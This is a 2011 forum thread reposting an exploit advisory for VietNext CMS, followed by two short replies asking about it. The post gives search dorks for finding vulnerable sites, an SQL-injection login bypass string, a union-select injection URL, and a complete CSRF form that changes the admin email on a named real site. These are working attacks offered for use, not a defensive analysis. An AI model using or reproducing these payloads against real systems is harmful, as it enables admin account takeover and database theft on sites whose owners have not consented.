VietNext CMS Multiple Vulnerabilities

Subyek: VietNext CMS Multiple Vulnerabilities Tue Jul 05, 2011 1:33 am

[+] Exploit Title:Multiple Vulnerabilities
[+] Date: 2011
[+] script:VietNext cms
[+] Software: http://vietnextco.com & http://vietnext.vn
[+] Author : pentesters.ir
[+] Website : WwW.PenTesters.IR
[+] dorks :"Developed & Design By VietNext" and "Design by VietNext"

---------------------------------------------------------------
vul1.Auth Bypass:
/path/admin/login.php
username:admin'or 'a'='a
password:admin'or 'a'='a
------------------------------
vul2.sql injection:
/path/?frame=product&cat=111%20union%20all%20select%200,1,concat(0x3a,database()),3,4,5,6,7,8,9,10,11,12,13--
------------------------------
vul3.remote change admin mail.
poc:

Code:: <html>
<head>
<body>
<h2>coded by pentesters.ir</h2>
<form method="post" name="frmForm" enctype="multipart/form-data" action="http://www.anq2011.org/admin/">
<input type="hidden" name="act" value="config_m">
<input type="hidden" name="id" value="3">
<input type="hidden" name="page" value="">
<table border="1" cellpadding="0" cellspacing="0" bordercolor="#0069A8" width="100%">
<tr>
<td>
   <table border="0" cellpadding="2" bordercolor="#111111" width="100%" cellspacing="0">
         <tr><td height="10"></td></tr>

         <tr>
      <td width="15%" class="smallfont" align="right"></td>
      <td width="1%" class="smallfont" align="center"><font color="#FF0000" size="2">*</font></td>
      <td width="83%" class="smallfont">
               <input readonly value="adminEmail" type="text" name="txtCode" class="textbox" size="34">
            </td>
      </tr>

         <tr>
      <td width="15%" class="smallfont" align="right">Title</td>
      <td width="1%" class="smallfont" align="center"></td>
      <td width="83%" class="smallfont">
               <input value="Email" type="text" name="txtName" class="textbox" size="34">
            </td>
      </tr>

         <tr>
      <td width="15%" class="smallfont" align="right">Value</td>
      <td width="1%" class="smallfont" align="center"></td>
      <td width="83%" class="smallfont">
               <input value="vqa.hcm@gmail.com" type="text" name="txtDetail" class="textbox" size="34">
            </td>
      </tr>


         <tr>
            <td width="15%" class="smallfont"></td>
            <td width="1%" class="smallfont" align="center"></td>
            <td width="83%" class="smallfont">
               <input type="submit" name="btnSave" VALUE="Update" class="button" onclick="return btnSave_onclick()">
            </td>
</body>
</html>

Subyek: Re: VietNext CMS Multiple Vulnerabilities Tue Jul 12, 2011 12:58 am

ijin nyimak om exploitnyaa VietNext CMS Multiple Vulnerabilities 2446797354

Subyek: Re: VietNext CMS Multiple Vulnerabilities Tue Jul 12, 2011 10:28 am

VietNext CMS Multiple Vulnerabilities 2116444611

ini apa exploit buat apa gan??

» VietNext CMS Multiple Vulnerabilities
» OpenCart 1.5.2.1 Multiple Vulnerabilities
» Clip Bucket 2.6 Multiple Vulnerabilities
» Seditio Portal Multiple Vulnerabilities(CSRF Add admin + add new article /Sql InjecTion)
» Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities